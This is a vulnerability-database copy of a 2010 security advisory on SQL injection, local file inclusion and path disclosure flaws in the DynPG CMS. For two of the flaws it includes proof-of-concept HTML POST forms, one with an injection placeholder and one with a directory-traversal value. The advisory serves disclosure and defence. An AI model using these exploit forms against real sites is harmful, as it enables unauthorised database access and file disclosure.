Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22701
HistoryNov 16, 2010 - 12:00 a.m.

Multiple Vulnerabilities in DynPG

2010-11-1600:00:00
High-Tech Bridge
www.htbridge.com
20

EPSS

0.038

Percentile

92.0%

JSON

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in DynPG which could be exploited to perform SQL injection attacks, disclose potentially sensitive information and compromise vulnerable system.

  1. Installation path disclosure weakness in in DynPG: CVE-2010-4401
    The weakness was found in the languages.inc.php script. A remote attacker can obtain knowledge of the application`s installation folder by directly accessing the vulnerable script.
    Exploitation example:
    http://[host]/languages.inc.php

  2. SQL injection vulnerabilities in DynPG: CVE-2010-4400
    The vulnerability exists due to input sanitation errors in the “giveRights_UserId” parameter in _rights.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    <form action=“http://[host]/_rights.php” method=“post” name=“main” >
    <input type=“hidden” name=“saveRights” value=“1” />
    <input type=“hidden” name=“giveRights_giveright” value=“1” />
    <input type=“hidden” name=“giveRights_UserId” value=“123’SQL_CODE_HERE” />
    <input type=“submit” value=“submit” name=“submit” />
    </form>

  3. Local file inclusion vulnerability in DynPG: CVE-2010-4399
    Input passed to the “CHG_DYNPG_SET_LANGUAGE” variable in index.php is not properly sanitized before being used to include local files. A remote attacker can include arbitrary files on the target system using directory traversal sequences.
    Exploitation example:
    <form action=“http://[host]/index.php” method=“post” name=“main” >
    <input type=“hidden” name=“SYSTEM_NAME” value=“[admin_login]” />
    <input type=“hidden” name=“SYSTEM_PASSWORD” value=“[admin_password]” />
    <input type=“hidden” name=“SET_LANGUAGE” value=“1” />
    <input type=“hidden” name=“CHG_DYNPG_SET_LANGUAGE” value=“…/…/…/…/…/” />
    <input type=“submit” value=“submit” name=“submit” />
    </form>

Related

exploitdb 1
prion 3
nvd 3
cve 3
cvelist 3
exploitdb
exploitdb
DynPG 4.2.0 - Multiple Vulnerabilities
2010-11-30 00:00:00
prion
prion
Sql injection
2010-12-06 13:37:00
Directory traversal
2010-12-06 13:37:00
Information disclosure
2010-12-06 13:37:00
nvd
nvd
CVE-2010-4401
2010-12-06 13:37:31
CVE-2010-4400
2010-12-06 13:37:31
CVE-2010-4399
2010-12-06 13:37:31
cve
cve
CVE-2010-4401
2010-12-06 13:37:31
CVE-2010-4399
2010-12-06 13:37:31
CVE-2010-4400
2010-12-06 13:37:31
cvelist
cvelist
CVE-2010-4401
2010-12-04 23:00:00
CVE-2010-4399
2010-12-04 23:00:00
CVE-2010-4400
2010-12-04 23:00:00

EPSS

0.038

Percentile

92.0%

JSON
Related for HTB22701
exploitdb1prion3nvd3cve3cvelist3